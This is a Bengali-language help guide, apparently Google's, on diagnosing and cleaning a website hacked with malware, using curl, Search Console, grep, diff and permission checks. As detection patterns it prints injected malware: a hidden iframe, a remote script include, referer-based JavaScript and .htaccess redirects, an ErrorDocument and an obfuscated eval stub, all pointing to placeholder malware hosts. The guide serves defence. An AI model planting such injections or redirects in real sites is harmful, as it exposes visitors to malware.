ম্যালওয়্যার দিয়ে হ্যাক করা হয়েছে

ম্যালওয়্যার হল কোনো সফ্টওয়্যার বা মোবাইল অ্যাপ্লিকেশন যা বিশেষভাবে একটি কম্পিউটার, একটি মোবাইল ডিভাইস, এটি চলমান সফ্টওয়্যার বা এর ব্যবহারকারীদের ক্ষতি করার জন্য ডিজাইন করা হয়েছে৷ ম্যালওয়্যার কী সে সম্পর্কে আরও তথ্যের জন্য, ম্যালওয়্যার এবং অবাঞ্ছিত সফ্টওয়্যার দেখুন৷

যদি আপনার সাইটে ম্যালওয়্যার থাকে, ব্যবহারকারীরা সাধারণত অনুসন্ধানের ফলাফলে বা ব্রাউজার দ্বারা দেখানো একটি ইন্টারস্টিশিয়াল পৃষ্ঠায় প্রদর্শিত সতর্কতা "এই সাইটটি আপনার কম্পিউটারের ক্ষতি করতে পারে" দেখতে পাবেন যখন ব্যবহারকারী আপনার সাইট দেখার চেষ্টা করে, এইরকম কিছু:

প্রতিনিধি ম্যালওয়্যার ইন্টারস্টিশিয়াল পৃষ্ঠা
একটি ম্যালওয়্যার সতর্কতা সহ ফলাফল অনুসন্ধান করুন৷

আপনার নিম্নলিখিতগুলির প্রয়োজন হবে:

  • আপনার সাইটের সার্ভারগুলিতে শেল বা টার্মিনাল অ্যাডমিনিস্ট্রেটর অ্যাক্সেস: ওয়েব, ডাটাবেস এবং ফাইল।
  • শেল বা টার্মিনাল কমান্ডের জ্ঞান।
  • ডাটাবেসে এসকিউএল কোয়েরি চালানোর ক্ষমতা।

প্রস্তুতি

  • সার্চ কনসোলের জন্য সাইন আপ করুন এবং সেখানে বর্ণিত আপনার হ্যাক করা সাইটের মালিকানা যাচাই করুন৷ সার্চ কনসোল প্রভাবিত পৃষ্ঠাগুলির একটি নমুনা প্রদান করে, যা হ্যাকড-সহ-ম্যালওয়্যার সমস্যাগুলি খুঁজে বের করা এবং ঠিক করা আরও সহজ করে তোলে। এছাড়াও, যখন আপনার সাইট অনেক ধরনের ম্যালওয়্যার বা অন্যান্য হ্যাক দ্বারা প্রভাবিত হয়েছে বলে শনাক্ত হবে তখন আপনাকে সতর্ক করা হবে।
  • একটি সাইট ব্যবহারকারীদের জন্য সম্ভাব্য ক্ষতিকারক কিনা সে সম্পর্কে সর্বজনীন তথ্য দেখতে Google নিরাপদ ব্রাউজিং ডায়াগনস্টিক পৃষ্ঠাটি দেখুন৷ আপনি এই অনুরূপ একটি URL এ আপনার পৃষ্ঠা বা সাইটের জন্য তালিকার অবস্থা দেখতে পারেন: https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>*** এর জন্য উদাহরণ: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>> একটি নির্দিষ্ট পৃষ্ঠা URL ( http://example.com/badpage ) বা আপনার সম্পূর্ণ সাইট (example.com) হতে পারে।

  • আপনার সাইটে পৃষ্ঠাগুলি দেখতে ব্রাউজার ব্যবহার করা এড়িয়ে চলুন। যেহেতু ম্যালওয়্যার প্রায়শই ব্রাউজারের দুর্বলতাকে কাজে লাগিয়ে ছড়িয়ে পড়ে, একটি ব্রাউজারে একটি ম্যালওয়্যার-সংক্রমিত পৃষ্ঠা খুললে আপনার কম্পিউটারের ক্ষতি হতে পারে৷ যদি না নির্ণয়ের নির্দেশাবলী সরাসরি আপনার ব্রাউজারে পৃষ্ঠাটি অ্যাক্সেস করতে না বলে, HTTP অনুরোধগুলি সম্পাদন করতে (উদাহরণস্বরূপ, একটি পৃষ্ঠা আনার জন্য) cURL বা Wget ব্যবহার করুন।

    এই অবাধে উপলব্ধ সরঞ্জামগুলি পুনঃনির্দেশ নির্ণয় করতে সহায়ক, এবং রেফারার বা ব্যবহারকারী-এজেন্ট তথ্য অন্তর্ভুক্ত করার নমনীয়তা রয়েছে৷ একটি নির্দিষ্ট রেফারার বা ব্যবহারকারী-এজেন্ট অন্তর্ভুক্ত করা হ্যাকারদের অনুকরণে সহায়ক, কারণ হ্যাকাররা কেবলমাত্র নির্দিষ্ট ব্যবহারকারী-এজেন্ট বা রেফারারদের সাথে আরও "বাস্তব ব্যক্তিদের" টার্গেট করতে এবং সাইটের মালিক এবং ম্যালওয়্যার স্ক্যানারদের কাছ থেকে সনাক্তকরণ এড়াতে ক্ষতিকারক সামগ্রী পরিবেশন করতে পারে৷

`curl -v --referer "http://www.google.com" <your-url>`

এখানে একটি উদাহরণ যা একজন ব্যবহারকারী এজেন্ট এবং একজন রেফারার উভয়কেই নির্দিষ্ট করে:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

আমরা --referer "https://www.google.com" সহ এবং ছাড়া একটি পৃষ্ঠা আনার পরামর্শ দিই, কারণ কিছু ম্যালওয়্যার তখনই সক্রিয় হয় যখন ব্যবহারকারীরা Google অনুসন্ধান ফলাফল থেকে আসে৷

  • এই ধাপ থেকে ফলাফল রেকর্ড করতে একটি নথি তৈরি করুন। দস্তাবেজটি অবশেষে (ন্যূনতম) প্রতিটি ক্ষতিগ্রস্ত ফাইলের নাম এবং অবস্থান এবং এটি কীভাবে সংক্রামিত হয়েছিল সে সম্পর্কে নোট অন্তর্ভুক্ত করবে এবং আপনার সাইটকে পরিষ্কার এবং বজায় রাখার ভিত্তি হিসাবে কাজ করবে।

  • ম্যালওয়্যার কীভাবে কাজ করে এবং আপনার ম্যালওয়্যার তদন্তের সময় আপনি কীভাবে নিরাপদ থাকতে পারেন তা দেখতে এই পৃষ্ঠার ভিডিওটি আগে দেখুন৷

রোগ নির্ণয়

কোন ম্যালওয়্যার আপনার সাইটকে প্রভাবিত করছে তা নির্ধারণ করুন:

  1. Search Console-এ আপনার সাইটের নিরাপত্তা সংক্রান্ত সমস্যার রিপোর্ট খুলুন। প্রভাবিত পৃষ্ঠাগুলির উদাহরণ দেখতে ম্যালওয়্যার সতর্কতার বিবরণ প্রসারিত করুন৷ মনে রাখবেন যে এই তালিকাটি সম্পূর্ণ নয়; আপনি আপনার সাইটে সব ধরনের ম্যালওয়্যারের উদাহরণ পেজ নাও পেতে পারেন।
  2. নিম্নলিখিত ধরণের ম্যালওয়্যারের জন্য আপনার উদাহরণ পৃষ্ঠাগুলি পরীক্ষা করুন৷

সার্ভার কনফিগারেশন ম্যালওয়্যার (অবাঞ্ছিত পুনঃনির্দেশ)

একজন হ্যাকার আপনার সাইটের সাথে আপস করেছে এবং আপনার ভাল সাইট থেকে দর্শকদের তাদের ম্যালওয়্যার অ্যাটাক সাইটে রিডাইরেক্ট করছে, সম্ভবত আপনার সার্ভারের কনফিগারেশন ফাইল(গুলি) পরিবর্তন করে। সার্ভার কনফিগারেশন ফাইলগুলি সাধারণত সাইট অ্যাডমিনিস্ট্রেটরকে একটি ওয়েবসাইটে নির্দিষ্ট পৃষ্ঠা বা ডিরেক্টরিগুলির জন্য URL পুনঃনির্দেশ নির্দিষ্ট করার অনুমতি দেয়। উদাহরণস্বরূপ, Apache সার্ভারে, এটি .htaccess ফাইলের পাশাপাশি httpd.conf

রোগ নির্ণয়

নিরাপত্তা সমস্যা প্রতিবেদনে দেখানো কিছু উদাহরণ URL দেখুন। "সার্ভার কনফিগারেশন" সংক্রমণ দ্বারা সংক্রামিত একটি পৃষ্ঠা থেকে একটি প্রতিক্রিয়া নিম্নলিখিত শিরোনাম অন্তর্ভুক্ত হতে পারে:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

প্রভাবিত ফাইল নির্ধারণ

শেল বা টার্মিনাল অ্যাক্সেসের মাধ্যমে আপনার সার্ভারে সাইন ইন করুন (আপনি চাইলে সাইটটি অফলাইন হতে পারে) এবং প্রাসঙ্গিক সার্ভার কনফিগারেশন ফাইলগুলি পর্যালোচনা করুন। আপনার সাইটে একাধিক হ্যাক সার্ভার কনফিগারেশন ফাইল থাকতে পারে। অবাঞ্ছিত নির্দেশাবলীর জন্য এই ফাইলগুলি পরীক্ষা করুন, যেমন অজানা সাইটে পুনঃনির্দেশ। উদাহরণস্বরূপ, .htaccess ` ফাইলে, আপনি একটি পুনঃনির্দেশ দেখতে পারেন যা এইরকম দেখাচ্ছে:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

এসকিউএল ইনজেকশন

একজন হ্যাকার আপনার সাইটের ডাটাবেসের সাথে আপস করেছে। উদাহরণস্বরূপ, হ্যাকার একটি ডাটাবেস টেবিলের প্রতিটি রেকর্ডে প্রোগ্রাম্যাটিকভাবে দূষিত কোড ঢোকিয়ে থাকতে পারে, যাতে সার্ভার যখন ডাটাবেস থেকে তথ্যের প্রয়োজন এমন একটি পৃষ্ঠা লোড করে, তখন দূষিত কোডটি এখন পৃষ্ঠার সামগ্রীতে এম্বেড করা হয় এবং সাইট দর্শকদের ক্ষতি করতে পারে৷

রোগ নির্ণয়

  1. কমান্ড-লাইনে প্রভাবিত ইউআরএলগুলিতে কিছু প্রশ্ন চালান এবং "iframe" বা "eval" এর মতো SQL আক্রমণ শব্দগুলির প্রতিক্রিয়া পরীক্ষা করুন৷
  2. আপনার ডাটাবেস সার্ভারে সাইন ইন করুন বা phpMyAdmin এর মত একটি টুলের মাধ্যমে আপনার ডাটাবেস দেখুন। আপনি যদি Wget বা cURL ব্যবহার করেন, তাহলে Wget বা cURL এর মাধ্যমে পৃষ্ঠার সোর্স কোডে প্রাপ্ত ক্ষতিকে প্রকৃত ডাটাবেস এন্ট্রির সাথে সংযুক্ত করার চেষ্টা করুন। উদাহরণস্বরূপ, যদি আপনি লক্ষ্য করেন যে আপনার পৃষ্ঠাগুলিতে একটি বিপজ্জনক iframe অন্তর্ভুক্ত রয়েছে, তাহলে আপনি iframe কোড অনুসন্ধান করার জন্য একটি SQL কোয়েরি সম্পাদন করতে পারেন৷ উদাহরণ স্বরূপ:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';
    
  3. আপনি অস্বাভাবিক কার্যকলাপের জন্য আপনার সার্ভারে ডাটাবেস লগ এবং ত্রুটি ফাইলগুলিও পরীক্ষা করতে চাইতে পারেন, যেমন অপ্রত্যাশিত SQL কমান্ড যা নিয়মিত ব্যবহারকারীদের জন্য অস্বাভাবিক বলে মনে হয় বা ত্রুটি৷

সমস্যাটি ঠিক করুন

হয় প্রতিটি সংক্রমিত ডাটাবেস রেকর্ড আপডেট করুন, অথবা আপনার সর্বশেষ পরিচিত ডাটাবেস ব্যাকআপ পুনরুদ্ধার করুন।

কোড ইনজেকশন

আপনার সাইটের পৃষ্ঠাগুলিকে দূষিত কোড অন্তর্ভুক্ত করার জন্য সংশোধন করা হয়েছে, যেমন একটি ম্যালওয়্যার আক্রমণ সাইটে একটি iframe।

রোগ নির্ণয়

সিআরএল বা wGet সহ নিরাপত্তা সমস্যা প্রতিবেদনে দেখানো কিছু উদাহরণ URL দেখুন এবং সন্দেহজনক কোড পরীক্ষা করুন। ইনজেকশনের কোড অনেক ধরনের হতে পারে, এবং খুঁজে পাওয়া কঠিন হতে পারে। iframe কোড খুঁজে পেতে "iframe" এর মতো শব্দগুলি অনুসন্ধান করা সহায়ক হতে পারে৷ অন্যান্য সহায়ক কীওয়ার্ড হল "স্ক্রিপ্ট", "ইভাল", এবং "আনস্কেপ।" উদাহরণস্বরূপ, ইউনিক্স-ভিত্তিক সিস্টেমে "iframe" এর জন্য সমস্ত ফাইল অনুসন্ধান করতে:

$grep -irn "iframe" ./ | less</pre>

এখানে কিছু সাধারণ ম্যালওয়্যার প্যাটার্ন আছে যা খুঁজতে হবে।

একটি আইফ্রেম যা একটি দূষিত সাইট লোড করে:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

জাভাস্ক্রিপ্ট বা অন্য স্ক্রিপ্টিং ভাষা যা আক্রমণের সাইট থেকে স্ক্রিপ্ট কল করে এবং চালায়:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

স্ক্রিপ্টিং যা ব্রাউজারকে একটি আক্রমণ সাইটে পুনঃনির্দেশিত করে:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

দূষিত কোড যা সনাক্তকরণ এড়াতে অস্পষ্ট করা হয়েছে:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

অন্যথায় সৌম্য স্ক্রিপ্টে এলোমেলোভাবে ক্ষতিকারক কোড লেখার জন্য ডিজাইন করা শেয়ার করা অবজেক্ট ফাইল:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

দূষিত ত্রুটি টেমপ্লেট

ত্রুটি বার্তাগুলির জন্য ব্যবহৃত টেমপ্লেট, যেমন 404 ফাইল পাওয়া যায়নি, ম্যালওয়্যার বিতরণ করার জন্য কনফিগার করা হয়েছে৷ এইভাবে, আক্রমণকারীরা এমন URLগুলিতে আক্রমণ শুরু করতে পারে যেগুলি এমনকি আপনার সাইটে বিদ্যমান নেই৷

রোগ নির্ণয়

আপনার সাইটে এমন একটি পৃষ্ঠার অনুরোধ করুন যা বিদ্যমান নেই, বা অন্য ধরনের ত্রুটি ছুঁড়েছে, এবং এটি অন্য সাইট থেকে এসেছে বা অন্যথায় ম্যালওয়্যার রয়েছে কিনা তা দেখতে প্রতিক্রিয়া পরীক্ষা করুন।

সমস্যাটি ঠিক করুন

আপনার ওয়েব সার্ভারে সাইন ইন করুন এবং ত্রুটি পৃষ্ঠা নির্দেশাবলীর জন্য আপনার সার্ভার কনফিগারেশন ফাইলগুলি অনুসন্ধান করুন৷ উদাহরণস্বরূপ, Apache ওয়েব সার্ভারের ত্রুটি টেমপ্লেট .htaccess ফাইলে ঘোষণা করা যেতে পারে। এখানে একটি উদাহরণ .htaccess ফাইল এন্ট্রি যা একটি দূষিত সাইট থেকে 404 ত্রুটি পৃষ্ঠা পুনরুদ্ধার করে:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

আপনি যখন আপনার সাইটটি পরিষ্কার করতে প্রস্তুত হন, তখন হয় .htaccess ফাইল(গুলি) একটি পরিচিত ভাল ব্যাকআপ দিয়ে প্রতিস্থাপন করুন, অথবা বিদ্যমান .htaccess ফাইল(গুলি) থেকে অবাঞ্ছিত ত্রুটি ডকুমেন্ট নির্দেশিকাগুলি মুছুন৷ প্রকৃত ত্রুটি ফাইলগুলি আপনার সাইটে বিদ্যমান থাকলে তা পরিষ্কার করতে ভুলবেন না। অবশেষে, সমস্ত পরিবর্তন কার্যকর হয় তা নিশ্চিত করতে আপনার ওয়েব সার্ভার পুনরায় চালু করুন।

একটি আপস করা বা ক্ষতিকারক সাইট থেকে সম্পদ লোড হচ্ছে {compromised-resources}

আপনার সাইট এমন একটি ওয়েবসাইট থেকে সামগ্রী বা সংস্থান ব্যবহার করে যা দূষিত সামগ্রী রয়েছে বলে পরিচিত৷ এগুলি জাভাস্ক্রিপ্ট ফাইল, ছবি বা অন্যান্য ফাইল হতে পারে। এই কারণে, আপনার সাইটটি সেই অন্য সাইট থেকে লোড হওয়া ম্যালওয়ারের জন্য পতাকাঙ্কিত হবে।

রোগ নির্ণয়

নিরাপত্তা সমস্যা প্রতিবেদনে দেখানো কিছু উদাহরণ URL দেখুন।

সমস্যাটি ঠিক করুন

  1. সার্চ কনসোলে নিরাপত্তা সমস্যা প্রতিবেদনে তালিকাভুক্ত কয়েকটি নমুনা URL ব্রাউজ করে সমস্যাটি নিশ্চিত করুন। আপনি একটি ব্রাউজার সতর্কতা দেখতে হবে.
  2. ব্রাউজার সতর্কতা আপনাকে সন্দেহজনক বিষয়বস্তুর ডোমেন বলে দেবে। ব্রাউজার সতর্কতায় তালিকাভুক্ত পতাকাঙ্কিত সাইটের সমস্ত রেফারেন্স সরান। যদি আপনার অজান্তে একটি পতাকাঙ্কিত সাইট থেকে সামগ্রী অন্তর্ভুক্ত করা হয়, তাহলে সমস্যাটি আরও গুরুতর। আপনার সাইটে সম্ভবত আপস করা হয়েছে, এবং অন্যান্য হ্যাক এবং দুর্বলতার জন্য আপনার সাইটটি পরীক্ষা করা চালিয়ে যাওয়া উচিত।
  3. যদি আপনি ইচ্ছাকৃতভাবে একটি বৈধ সাইট থেকে বিষয়বস্তু অন্তর্ভুক্ত করেন যা পতাকাঙ্কিত হয়েছে এবং আপনি পতাকাঙ্কিত সাইটটি পরিষ্কার করার পরে বিষয়বস্তু পুনরায় অন্তর্ভুক্ত করতে চান, আপনি সেই সাইটের জন্য Google নিরাপদ ব্রাউজিং ডায়াগনস্টিক পৃষ্ঠা ব্যবহার করে পতাকাঙ্কিত সাইটের অবস্থা পর্যবেক্ষণ করতে পারেন ( http://www.google.com/safebrowsing/diagnostic?site=www.example.com ){:.external}। বৈধ সাইটের মালিকরা সাধারণত সেগুলি দ্রুত পরিষ্কার করে।

অতিরিক্ত তদন্ত

এরপরে, আপনার সিস্টেমে কোনো অতিরিক্ত দূষিত ফাইল বা পরিবর্তনের জন্য পরীক্ষা করুন। হ্যাকার বিদ্যমান পৃষ্ঠাগুলি বা ডাটাবেস রেকর্ডগুলিকে সংশোধন করতে পারে, সম্পূর্ণ নতুন স্প্যামি পৃষ্ঠাগুলি তৈরি করেছে, লিখিত ফাংশনগুলি যা পরিষ্কার পৃষ্ঠাগুলিতে স্প্যাম প্রদর্শন করে, বা "ব্যাক ডোরস" রেখে গেছে যা হ্যাকারকে আপনার সাইটে পুনরায় প্রবেশের অনুমতি দেয়, বা দূষিত কোড পুনরায় ইনজেক্ট করে যে আপনি অপসারণ করেছেন.

আপনার সাইট অনলাইন হলে, এই তদন্তের জন্য এটি অফলাইনে নেওয়ার কথা বিবেচনা করুন।

আপনার যদি আপনার সাইটের একটি পরিচিত ভাল ব্যাকআপ থাকে তবে ব্যাকআপের পর থেকে কোন ফাইলগুলি তৈরি বা সংশোধন করা হয়েছে তা নির্ধারণ করুন এবং সেগুলি তদন্ত করুন৷ ইউনিক্স-ভিত্তিক সিস্টেমে, আপনি নতুন ফাইলগুলি খুঁজতে নিম্নলিখিতগুলির মতো একটি কমান্ড ব্যবহার করতে পারেন:

diff -qr <current-directory> <backup-directory>

উদাহরণ স্বরূপ:

diff -qr www/ backups/full-backup-20120124/

এছাড়াও:

md5sum <current-page> <backup-page>

উদাহরণ স্বরূপ:

md5sum www/page.html backups/full-backup-20120124/page.html

ব্যর্থ লগইন প্রচেষ্টা, কমান্ড ইতিহাস (বিশেষ করে রুট হিসাবে), এবং অজানা ব্যবহারকারী অ্যাকাউন্ট তৈরির মতো সন্দেহজনক কার্যকলাপের জন্য সার্ভার, অ্যাক্সেস এবং ত্রুটি লগগুলি পরীক্ষা করুন ৷ সচেতন থাকুন যে হ্যাকার তাদের নিজস্ব উদ্দেশ্যে এই লগগুলি পরিবর্তন করতে পারে৷ দুর্বলতা চিহ্নিত করার জন্য ভিডিওতে কিছু উদাহরণ দেখানো হয়েছে।

পুনঃনির্দেশের জন্য কনফিগারেশন ফাইল চেক করুন । আপনার কনফিগারেশন ফাইলের নাম সাধারণত .htaccess এবং httpd.conf হয়। হ্যাকাররা প্রায়ই ইউজার-এজেন্ট, দিনের সময় বা রেফারারের উপর ভিত্তি করে শর্তসাপেক্ষ পুনঃনির্দেশ তৈরি করে। আপনি যদি কনফিগারেশন ফাইল আপডেট করতে চান, আপনার পরিবর্তনগুলি কার্যকর করার জন্য আপনাকে আপনার সার্ভার পুনরায় চালু করতে হতে পারে।

অত্যধিক-নম্র ফোল্ডার এবং ফাইল অনুমতি পরীক্ষা করুন. হ্যাকাররা অনুমতির সাথে হস্তক্ষেপ করে কারণ যদি সাইট মালিকের কাছ থেকে নম্র অনুমতিগুলি সনাক্ত করা না যায়, হ্যাকারের কাছে সাইটে পুনরায় প্রবেশ করার একটি উপায় থাকবে। 644 (rw-r--r--) এর চেয়ে বড় ফাইল এবং 755 (rwxr-xr-x) এর চেয়ে বেশি ফোল্ডার নিরাপত্তা সমস্যা সৃষ্টি করতে পারে। নিশ্চিত করুন যে কোনো শিথিল অনুমতি সত্যিই প্রয়োজনীয়। ইউনিক্স-ভিত্তিক সিস্টেমে, চেষ্টা করুন:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

এবং:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

আপনার যদি একটি ডাটাবেস থাকে, phpMyAdmin এর মতো একটি টুল ব্যবহার করে রেকর্ডের মাধ্যমে রেকর্ড অনুসন্ধান করুন।